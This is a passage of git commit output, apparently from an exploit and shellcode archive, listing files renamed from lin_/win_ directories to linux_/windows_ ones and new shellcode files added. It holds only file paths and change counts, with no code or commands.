linux_x86}/20196.c | 0 shellcodes/{lin_x86 => linux_x86}/23622.c | 0 shellcodes/{lin_x86 => linux_x86}/25497.c | 0 shellcodes/{lin_x86 => linux_x86}/28474.c | 0 shellcodes/{lin_x86 => linux_x86}/34060.c | 0 shellcodes/{lin_x86 => linux_x86}/34262.c | 0 shellcodes/{lin_x86 => linux_x86}/34592.c | 0 shellcodes/{lin_x86 => linux_x86}/34778.c | 0 shellcodes/{lin_x86 => linux_x86}/35519.txt | 0 shellcodes/{lin_x86 => linux_x86}/36391.c | 0 shellcodes/{lin_x86 => linux_x86}/36393.c | 0 shellcodes/{lin_x86 => linux_x86}/36394.c | 0 shellcodes/{lin_x86 => linux_x86}/36395.c | 0 shellcodes/{lin_x86 => linux_x86}/36397.c | 0 shellcodes/{lin_x86 => linux_x86}/36398.c | 0 shellcodes/{lin_x86 => linux_x86}/36637.c | 0 shellcodes/{lin_x86 => linux_x86}/36672.asm | 0 shellcodes/{lin_x86 => linux_x86}/36701.c | 0 shellcodes/{lin_x86 => linux_x86}/36750.c | 0 shellcodes/{lin_x86 => linux_x86}/36778.c | 0 shellcodes/{lin_x86 => linux_x86}/36857.c | 0 shellcodes/{lin_x86 => linux_x86}/36908.c | 0 shellcodes/{lin_x86 => linux_x86}/36921.c | 0 shellcodes/{lin_x86 => linux_x86}/37069.c | 0 shellcodes/{lin_x86 => linux_x86}/37251.asm | 0 shellcodes/{lin_x86 => linux_x86}/37285.txt | 0 shellcodes/{lin_x86 => linux_x86}/37289.txt | 0 shellcodes/{lin_x86 => linux_x86}/37297.txt | 0 shellcodes/{lin_x86 => linux_x86}/37358.c | 0 shellcodes/{lin_x86 => linux_x86}/37359.c | 0 shellcodes/{lin_x86 => linux_x86}/37365.c | 0 shellcodes/{lin_x86 => linux_x86}/37366.c | 0 shellcodes/{lin_x86 => linux_x86}/37384.c | 0 shellcodes/{lin_x86 => linux_x86}/37390.asm | 0 shellcodes/{lin_x86 => linux_x86}/37391.asm | 0 shellcodes/{lin_x86 => linux_x86}/37392.asm | 0 shellcodes/{lin_x86 => linux_x86}/37393.asm | 0 shellcodes/{lin_x86 => linux_x86}/37495.py | 0 shellcodes/{lin_x86 => linux_x86}/37749.c | 0 shellcodes/{lin_x86 => linux_x86}/37762.py | 0 shellcodes/{lin_x86 => linux_x86}/38088.c | 0 shellcodes/{lin_x86 => linux_x86}/38116.c | 0 shellcodes/{lin_x86 => linux_x86}/39160.c | 0 shellcodes/{lin_x86 => linux_x86}/39204.c | 0 shellcodes/{lin_x86 => linux_x86}/39389.c | 0 shellcodes/{lin_x86 => linux_x86}/39722.c | 0 shellcodes/{lin_x86 => linux_x86}/39723.c | 0 shellcodes/{lin_x86 => linux_x86}/39851.c | 0 shellcodes/{lin_x86 => linux_x86}/39901.c | 0 shellcodes/{lin_x86 => linux_x86}/40026.txt | 0 shellcodes/{lin_x86 => linux_x86}/40056.c | 0 shellcodes/{lin_x86 => linux_x86}/40075.c | 0 shellcodes/{lin_x86 => linux_x86}/40110.c | 0 shellcodes/{lin_x86 => linux_x86}/40131.c | 0 shellcodes/{lin_x86 => linux_x86}/40179.c | 0 shellcodes/{lin_x86 => linux_x86}/40222.c | 0 shellcodes/{lin_x86 => linux_x86}/40223.c | 0 shellcodes/{lin_x86 => linux_x86}/40827.c | 0 shellcodes/{lin_x86 => linux_x86}/40872.c | 0 shellcodes/{lin_x86 => linux_x86}/40924.c | 0 shellcodes/{lin_x86 => linux_x86}/41282.nasm | 0 shellcodes/{lin_x86 => linux_x86}/41403.c | 0 shellcodes/{lin_x86 => linux_x86}/41630.asm | 0 shellcodes/{lin_x86 => linux_x86}/41631.c | 0 shellcodes/{lin_x86 => linux_x86}/41635.txt | 0 shellcodes/{lin_x86 => linux_x86}/41723.c | 0 shellcodes/{lin_x86 => linux_x86}/41757.txt | 0 shellcodes/{lin_x86 => linux_x86}/41909.c | 0 shellcodes/{lin_x86 => linux_x86}/41969.c | 0 shellcodes/{lin_x86 => linux_x86}/42177.c | 0 shellcodes/{lin_x86 => linux_x86}/42208.nasm | 0 shellcodes/{lin_x86 => linux_x86}/42254.c | 0 shellcodes/{lin_x86 => linux_x86}/42295.c | 0 shellcodes/{lin_x86 => linux_x86}/42428.c | 0 shellcodes/{lin_x86 => linux_x86}/42594.c | 0 shellcodes/{lin_x86 => linux_x86}/42977.c | 0 shellcodes/{lin_x86 => linux_x86}/43433.c | 0 shellcodes/{lin_x86 => linux_x86}/43476.c | 0 shellcodes/{lin_x86 => linux_x86}/43489.c | 0 shellcodes/{sh4 => superh_sh4}/17432.c | 0 shellcodes/{sh4 => superh_sh4}/17439.c | 0 shellcodes/{sh4 => superh_sh4}/18154.c | 0 shellcodes/superh_sh4/43541.c | 27 + shellcodes/superh_sh4/43542.c | 81 ++ .../{win_x86-64 => windows_x86-64}/13533.asm | 0 .../{win_x86-64 => windows_x86-64}/13719.txt | 0 .../{win_x86-64 => windows_x86-64}/13729.txt | 0 .../{win_x86-64 => windows_x86-64}/35794.txt | 0 .../{win_x86-64 => windows_x86-64}/37895.asm | 0 .../{win_x86-64 => windows_x86-64}/40549.c | 0 .../{win_x86-64 => windows_x86-64}/40781.c | 0 .../{win_x86-64 => windows_x86-64}/40821.c | 0 .../{win_x86-64 => windows_x86-64}/40890.c | 0 .../{win_x86-64 => windows_x86-64}/40981.c | 0 .../{win_x86-64 => windows_x86-64}/41072.c | 0 .../{win_x86-64 => windows_x86-64}/41827.txt | 0 .../{win_x86-64 => windows_x86-64}/42992.c | 0 shellcodes/{win_x86 => windows_x86}/13504.asm | 0 shellcodes/{win_x86 => windows_x86}/13505.c | 0 shellcodes/{win_x86 => windows_x86}/13507.txt | 0 shellcodes/{win_x86 => windows_x86}/13508.asm | 0 shellcodes/{win_x86 => windows_x86}/13509.c | 0 shellcodes/{win_x86 => windows_x86}/13510.c | 0 shellcodes/{win_x86 => windows_x86}/13511.c | 0 shellcodes/{win_x86 => windows_x86}/13512.c | 0 shellcodes/{win_x86 => windows_x86}/13513.c | 0 shellcodes/{win_x86 => windows_x86}/13514.asm | 0 shellcodes/{win_x86 => windows_x86}/13516.asm | 0 shellcodes/{win_x86 => windows_x86}/13517.asm | 0 shellcodes/{win_x86 => windows_x86}/13518.c | 0 shellcodes/{win_x86 => windows_x86}/13519.c | 0 shellcodes/{win_x86 => windows_x86}/13520.c | 0 shellcodes/{win_x86 => windows_x86}/13521.asm | 0 shellcodes/{win_x86 => windows_x86}/13522.c | 0 shellcodes/{win_x86 => windows_x86}/13523.c | 0 shellcodes/{win_x86 => windows_x86}/13524.txt | 0 shellcodes/{win_x86 => windows_x86}/13525.c | 0 shellcodes/{win_x86 => windows_x86}/13526.c | 0 shellcodes/{win_x86 => windows_x86}/13527.c | 0 shellcodes/{win_x86 => windows_x86}/13529.c | 0 shellcodes/{win_x86 => windows_x86}/13530.asm | 0 shellcodes/{win_x86 => windows_x86}/13531.c | 0 shellcodes/{win_x86 => windows_x86}/13532.asm | 0 shellcodes/{win_x86 => windows_x86}/13565.asm | 0 shellcodes/{win_x86 => windows_x86}/13569.asm | 0 shellcodes/{win_x86 => windows_x86}/13571.c | 0 shellcodes/{win_x86 => windows_x86}/13574.c | 0 shellcodes/{win_x86 => windows_x86}/13595.c | 0 shellcodes/{win_x86 => windows_x86}/13614.c | 0 shellcodes/{win_x86 => windows_x86}/13615.c | 0 shellcodes/{win_x86 => windows_x86}/13630.c | 0 shellcodes/{win_x86 => windows_x86}/13631.c | 0 shellcodes/{win_x86 => windows_x86}/13635.txt | 0 shellcodes/{win_x86 => windows_x86}/13636.c | 0 shellcodes/{win_x86 => windows_x86}/13639.c | 0 shellcodes/{win_x86 => windows_x86}/13642.txt | 0 shellcodes/{win_x86 => windows_x86}/13647.txt | 0 shellcodes/{win_x86 => windows_x86}/13648.rb | 0 shellcodes/{win_x86 => windows_x86}/13699.txt | 0 shellcodes/{win_x86 => windows_x86}/14014.pl | 0 shellcodes/{win_x86 => windows_x86}/14288.asm | 0 shellcodes/{win_x86 => windows_x86}/14873.asm | 0 shellcodes/{win_x86 => windows_x86}/15063.c | 0 shellcodes/{win_x86 => windows_x86}/15202.c | 0 shellcodes/{win_x86 => windows_x86}/15203.c | 0 shellcodes/{win_x86 => windows_x86}/15879.txt | 0 shellcodes/{win_x86 => windows_x86}/16283.txt | 0 shellcodes/{win_x86 => windows_x86}/17545.txt | 0 shellcodes/{win_x86 => windows_x86}/35793.txt | 0 shellcodes/{win_x86 => windows_x86}/36779.c | 0 shellcodes/{win_x86 => windows_x86}/36780.c | 0 shellcodes/{win_x86 => windows_x86}/37664.c | 0 shellcodes/{win_x86 => windows_x86}/37758.c | 0 shellcodes/{win_x86 => windows_x86}/39519.c | 0 shellcodes/{win_x86 => windows_x86}/39754.txt | 0 shellcodes/{win_x86 => windows_x86}/39900.c | 0 shellcodes/{win_x86 => windows_x86}/39914.c | 0 shellcodes/{win_x86 => windows_x86}/40005.c | 0 shellcodes/{win_x86 => windows_x86}/40094.c | 0 shellcodes/{win_x86 => windows_x86}/40175.c | 0 shellcodes/{win_x86 => windows_x86}/40245.c | 0 shellcodes/{win_x86 => windows_x86}/40246.c | 0 shellcodes/{win_x86 => windows_x86}/40259.c | 0 shellcodes/{win_x86 => windows_x86}/40334.c | 0 shellcodes/{win_x86 => windows_x86}/40352.c | 0 shellcodes/{win_x86 => windows_x86}/40363.c | 0 shellcodes/{win_x86 => windows_x86}/40560.asm | 0 shellcodes/{win_x86 => windows_x86}/41381.c | 0 shellcodes/{win_x86 => windows_x86}/41467.c | 0 shellcodes/{win_x86 => windows_x86}/41481.asm | 0 shellcodes/{win_x86 => windows_x86}/41581.c | 0 667 files changed, 2007 insertions(+), 653 deletions(-) rename exploits/{lin_x86-64 => linux_x86-64}/dos/21224.c (100%) rename exploits/{lin_x86-64 => linux_x86-64}/dos/33585.txt (100%) rename exploits/{lin_x86-64 => linux_x86-64}/dos/36266.c (100%) rename exploits/{lin_x86-64 => linux_x86-64}/dos/37868.txt (100%) rename exploits/{lin_x86-64 => linux_x86-64}/dos/37876.txt (100%) rename exploits/{lin_x86-64 => linux_x86-64}/dos/37879.txt (100%) rename exploits/{lin_x86-64 => linux_x86-64}/dos/37880.txt (100%) rename exploits/{lin_x86-64 => linux_x86-64}/local/15023.c (100%) rename exploits/{lin_x86-64 => linux_x86-64}/local/15024.c (100%) rename exploits/{lin_x86-64 => linux_x86-64}/local/24555.c (100%) rename exploits/{lin_x86-64 => linux_x86-64}/local/24746.c (100%) rename exploits/{lin_x86-64 => linux_x86-64}/local/26131.c (100%) rename exploits/{lin_x86-64 => linux_x86-64}/local/31347.c (100%) rename exploits/{lin_x86-64 => linux_x86-64}/local/32751.c (100%) rename exploits/{lin_x86-64 => linux_x86-64}/local/33516.c (100%) rename exploits/{lin_x86-64 => linux_x86-64}/local/33589.c (100%) rename exploits/{lin_x86-64 => linux_x86-64}/local/34134.c (100%) rename exploits/{lin_x86-64 => linux_x86-64}/local/35472.txt (100%) rename exploits/{lin_x86-64 => linux_x86-64}/local/36310.txt (100%) rename exploits/{lin_x86-64 => linux_x86-64}/local/36311.txt (100%) rename exploits/{lin_x86-64 => linux_x86-64}/local/37722.c (100%) rename exploits/{lin_x86-64 => linux_x86-64}/local/40049.c (100%) rename exploits/{lin_x86-64 => linux_x86-64}/local/40811.c (100%) rename exploits/{lin_x86-64 => linux_x86-64}/local/40871.c (100%) rename exploits/{lin_x86-64 => linux_x86-64}/local/42275.c (100%) rename exploits/{lin_x86-64 => linux_x86-64}/local/4460.c (100%) rename exploits/{lin_x86-64 => linux_x86-64}/local/9083.c (100%) rename exploits/{lin_x86-64 => linux_x86-64}/remote/32277.txt (100%) rename exploits/{lin_x86-64 => linux_x86-64}/remote/42964.rb (100%) rename exploits/{lin_x86 => linux_x86}/dos/36741.py (100%) rename exploits/{lin_x86 => linux_x86}/dos/38763.txt (100%) rename exploits/{lin_x86 => linux_x86}/dos/39669.txt (100%) rename exploits/{lin_x86 => linux_x86}/local/15916.c (100%) rename exploits/{lin_x86 => linux_x86}/local/26709.txt (100%) rename exploits/{lin_x86 => linux_x86}/local/37724.asm (100%) rename exploits/{lin_x86 => linux_x86}/local/40435.rb (100%) rename exploits/{lin_x86 => linux_x86}/local/42273.c (100%) rename exploits/{lin_x86 => linux_x86}/local/42274.c (100%) rename exploits/{lin_x86 => linux_x86}/local/42276.c (100%) rename exploits/{lin_x86 => linux_x86}/local/9542.c (100%) rename exploits/{lin_x86 => linux_x86}/remote/1291.pl (100%) rename exploits/{lin_x86 => linux_x86}/remote/16860.rb (100%) rename exploits/{lin_x86 => linux_x86}/remote/16861.rb (100%) rename exploits/{lin_x86 => linux_x86}/remote/20032.txt (100%) rename exploits/{lin_x86 => linux_x86}/remote/26737.pl (100%) rename exploits/{lin_x86 => linux_x86}/remote/269.c (100%) rename exploits/{lin_x86 => linux_x86}/remote/3615.c (100%) rename exploits/{lin_x86 => linux_x86}/remote/43030.rb (100%) rename exploits/{lin_x86 => linux_x86}/remote/43031.rb (100%) rename exploits/{lin_x86 => linux_x86}/webapps/34030.txt (100%) create mode 100644 exploits/php/webapps/43535.txt create mode 100644 exploits/php/webapps/43543.txt create mode 100644 exploits/windows/dos/43547.txt create mode 100644 exploits/windows/dos/43548.txt create mode 100755 exploits/windows/remote/43523.py rename exploits/{win_x86-64 => windows_x86-64}/dos/18275.txt (100%) rename exploits/{win_x86-64 => windows_x86-64}/dos/38085.pl (100%) rename exploits/{win_x86-64 => windows_x86-64}/dos/39043.txt (100%) rename exploits/{win_x86-64 => windows_x86-64}/dos/39072.txt (100%) rename exploits/{win_x86-64 => windows_x86-64}/dos/39221.txt (100%) rename exploits/{win_x86-64 => windows_x86-64}/dos/39712.txt (100%) rename exploits/{win_x86-64 => windows_x86-64}/dos/40196.txt (100%) rename exploits/{win_x86-64 => windows_x86-64}/dos/41547.py (100%) rename exploits/{win_x86-64 => windows_x86-64}/dos/42445.html (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/20861.txt (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/30393.rb (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/37064.py (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/38222.rb (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/39035.txt (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/39520.txt (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/39525.py (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/39984.txt (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/40336.py (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/40337.py (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/40342.py (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/40348.py (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/40349.py (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/40380.py (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/40451.rb (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/41020.c (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/41605.txt (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/41721.c (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/41722.c (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/41908.txt (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/42368.rb (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/42435.txt (100%) rename exploits/{win_x86-64 => windows_x86-64}/local/42960.txt (100%) rename exploits/{win_x86-64 => windows_x86-64}/remote/34334.rb (100%) rename exploits/{win_x86-64 => windows_x86-64}/remote/39999.rb (100%) rename exploits/{win_x86-64 => windows_x86-64}/remote/42030.py (100%) rename exploits/{win_x86-64 => windows_x86-64}/remote/42031.py (100%) rename exploits/{win_x86-64 => windows_x86-64}/remote/42354.html (100%) rename exploits/{win_x86 => windows_x86}/dos/10102.pl (100%) rename exploits/{win_x86 => windows_x86}/dos/12457.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/15214.py (100%) rename exploits/{win_x86 => windows_x86}/dos/15306.pl (100%) rename exploits/{win_x86 => windows_x86}/dos/15758.c (100%) rename exploits/{win_x86 => windows_x86}/dos/1977.cpp (100%) rename exploits/{win_x86 => windows_x86}/dos/34010.html (100%) rename exploits/{win_x86 => windows_x86}/dos/35182.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/3527.pl (100%) rename exploits/{win_x86 => windows_x86}/dos/37881.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/38265.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/38266.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/38267.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/38268.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/38269.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/38270.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/38271.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/38273.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/38274.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/38275.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/38276.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/38277.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/38278.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/38279.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/38280.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/38307.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/38444.py (100%) rename exploits/{win_x86 => windows_x86}/dos/39026.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/39027.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/39797.py (100%) rename exploits/{win_x86 => windows_x86}/dos/39993.txt (100%) rename exploits/{win_x86 => windows_x86}/dos/420.java (100%) rename exploits/{win_x86 => windows_x86}/dos/4293.php (100%) rename exploits/{win_x86 => windows_x86}/dos/4318.php (100%) rename exploits/{win_x86 => windows_x86}/dos/8611.pl (100%) rename exploits/{win_x86 => windows_x86}/dos/9606.pl (100%) rename exploits/{win_x86 => windows_x86}/local/11112.c (100%) rename exploits/{win_x86 => windows_x86}/local/11408.c (100%) rename exploits/{win_x86 => windows_x86}/local/14373.pl (100%) rename exploits/{win_x86 => windows_x86}/local/14961.py (100%) rename exploits/{win_x86 => windows_x86}/local/16678.rb (100%) rename exploits/{win_x86 => windows_x86}/local/18137.rb (100%) rename exploits/{win_x86 => windows_x86}/local/18861.php (100%) rename exploits/{win_x86 => windows_x86}/local/26452.rb (100%) rename exploits/{win_x86 => windows_x86}/local/33213.rb (100%) rename exploits/{win_x86 => windows_x86}/local/34037.txt (100%) rename exploits/{win_x86 => windows_x86}/local/34167.rb (100%) rename exploits/{win_x86 => windows_x86}/local/3451.c (100%) rename exploits/{win_x86 => windows_x86}/local/34982.rb (100%) rename exploits/{win_x86 => windows_x86}/local/35020.rb (100%) rename exploits/{win_x86 => windows_x86}/local/37732.c (100%) rename exploits/{win_x86 => windows_x86}/local/38403.txt (100%) rename exploits/{win_x86 => windows_x86}/local/3888.c (100%) rename exploits/{win_x86 => windows_x86}/local/3912.c (100%) rename exploits/{win_x86 => windows_x86}/local/39432.c (100%) rename exploits/{win_x86 => windows_x86}/local/39446.py (100%) rename exploits/{win_x86 => windows_x86}/local/39574.cs (100%) rename exploits/{win_x86 => windows_x86}/local/40039.cpp (100%) rename exploits/{win_x86 => windows_x86}/local/40564.c (100%) rename exploits/{win_x86 => windows_x86}/local/40627.c (100%) rename exploits/{win_x86 => windows_x86}/local/43192.c (100%) rename exploits/{win_x86 => windows_x86}/local/8799.txt (100%) rename exploits/{win_x86 => windows_x86}/remote/11615.txt (100%) rename exploits/{win_x86 => windows_x86}/remote/1264.pl (100%) rename exploits/{win_x86 => windows_x86}/remote/14941.rb (100%) rename exploits/{win_x86 => windows_x86}/remote/16466.rb (100%) rename exploits/{win_x86 => windows_x86}/remote/16714.rb (100%) rename exploits/{win_x86 => windows_x86}/remote/16731.rb (100%) rename exploits/{win_x86 => windows_x86}/remote/16738.rb (100%) rename exploits/{win_x86 => windows_x86}/remote/16743.rb (100%) rename exploits/{win_x86 => windows_x86}/remote/16751.rb (100%) rename exploits/{win_x86 => windows_x86}/remote/16759.rb (100%) rename exploits/{win_x86 => windows_x86}/remote/16763.rb (100%) rename exploits/{win_x86 => windows_x86}/remote/16782.rb (100%) rename exploits/{win_x86 => windows_x86}/remote/16783.rb (100%) rename exploits/{win_x86 => windows_x86}/remote/16786.rb (100%) rename exploits/{win_x86 => windows_x86}/remote/16809.rb (100%) rename exploits/{win_x86 => windows_x86}/remote/16825.rb (100%) rename exploits/{win_x86 => windows_x86}/remote/2680.pm (100%) rename exploits/{win_x86 => windows_x86}/remote/3680.sh (100%) rename exploits/{win_x86 => windows_x86}/remote/37812.rb (100%) rename exploits/{win_x86 => windows_x86}/remote/3822.c (100%) rename exploits/{win_x86 => windows_x86}/remote/38599.py (100%) rename exploits/{win_x86 => windows_x86}/remote/39729.rb (100%) rename exploits/{win_x86 => windows_x86}/remote/43125.html (100%) rename exploits/{win_x86 => windows_x86}/remote/4754.pl (100%) rename exploits/{win_x86 => windows_x86}/remote/5079.c (100%) rename exploits/{win_x86 => windows_x86}/remote/5330.c (100%) rename exploits/{win_x86 => windows_x86}/remote/584.c (100%) rename exploits/{win_x86 => windows_x86}/remote/6100.py (100%) rename exploits/{win_x86 => windows_x86}/remote/8613.py (100%) rename exploits/{win_x86 => windows_x86}/remote/8614.py (100%) rename exploits/{win_x86 => windows_x86}/remote/8621.py (100%) rename exploits/{win_x86 => windows_x86}/remote/8623.rb (100%) rename exploits/{win_x86 => windows_x86}/webapps/14628.txt (100%) rename exploits/{win_x86 => windows_x86}/webapps/15100.txt (100%) rename exploits/{win_x86 => windows_x86}/webapps/15102.txt (100%) rename exploits/{win_x86 => windows_x86}/webapps/15128.txt (100%) create mode 100644 shellcodes/arm/43530.c create mode 100644 shellcodes/arm/43531.c create mode 100644 shellcodes/arm/43532.c create mode 100644 shellcodes/arm/43533.c create mode 100644 shellcodes/arm/43534.c create mode 100644 shellcodes/arm/43536.c create mode 100644 shellcodes/arm/43537.c create mode 100644 shellcodes/arm/43538.c create mode 100644 shellcodes/arm/43539.c rename shellcodes/{hardware => linux_mips}/27132.txt (100%) create mode 100644 shellcodes/linux_sparc/43545.c create mode 100644 shellcodes/linux_sparc/43546.c rename shellcodes/{lin_x86-64 => linux_x86-64}/13296.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/13320.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/13463.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/13464.s (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/13670.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/13688.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/13691.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/13908.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/13915.txt (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/13943.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/14305.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/18197.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/18585.s (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/34667.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/35205.txt (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/35586.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/35587.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/36359.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/36858.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/37362.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/37401.asm (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/38150.txt (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/38239.asm (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/38469.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/38708.asm (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/38815.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/39149.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/39152.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/39185.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/39203.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/39312.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/39383.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/39388.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/39390.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/39578.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/39617.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/39624.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/39625.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/39684.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/39700.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/39718.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/39758.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/39763.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/39847.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/39869.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/40029.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/40052.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/40061.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/40079.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/40122.txt (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/40139.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/40808.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/41089.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/41128.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/41174.nasm (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/41398.nasm (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/41439.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/41468.nasm (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/41477.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/41498.nasm (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/41503.nasm (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/41509.nasm (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/41510.nsam (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/41750.txt (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/41883.txt (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/41970.asm (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/42126.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/42179.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/42339.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/42485.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/42522.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/42523.c (100%) rename shellcodes/{lin_x86-64 => linux_x86-64}/42791.c (100%) create mode 100644 shellcodes/linux_x86-64/43549.c create mode 100644 shellcodes/linux_x86-64/43550.c create mode 100644 shellcodes/linux_x86-64/43551.c create mode 100644 shellcodes/linux_x86-64/43552.c create mode 100644 shellcodes/linux_x86-64/43553.c rename shellcodes/{lin_x86 => linux_x86}/13307.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13308.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13309.asm (100%) rename shellcodes/{lin_x86 => linux_x86}/13310.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13311.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13312.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13313.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13314.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13315.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13316.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13317.s (100%) rename shellcodes/{lin_x86 => linux_x86}/13318.s (100%) rename shellcodes/{lin_x86 => linux_x86}/13319.s (100%) rename shellcodes/{lin_x86 => linux_x86}/13321.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13322.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13323.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13324.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13325.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13326.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13327.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13329.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13330.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13331.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13332.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13333.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/13334.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/13335.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13336.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13337.c (100%) rename shellcodes/{lin_x86 => 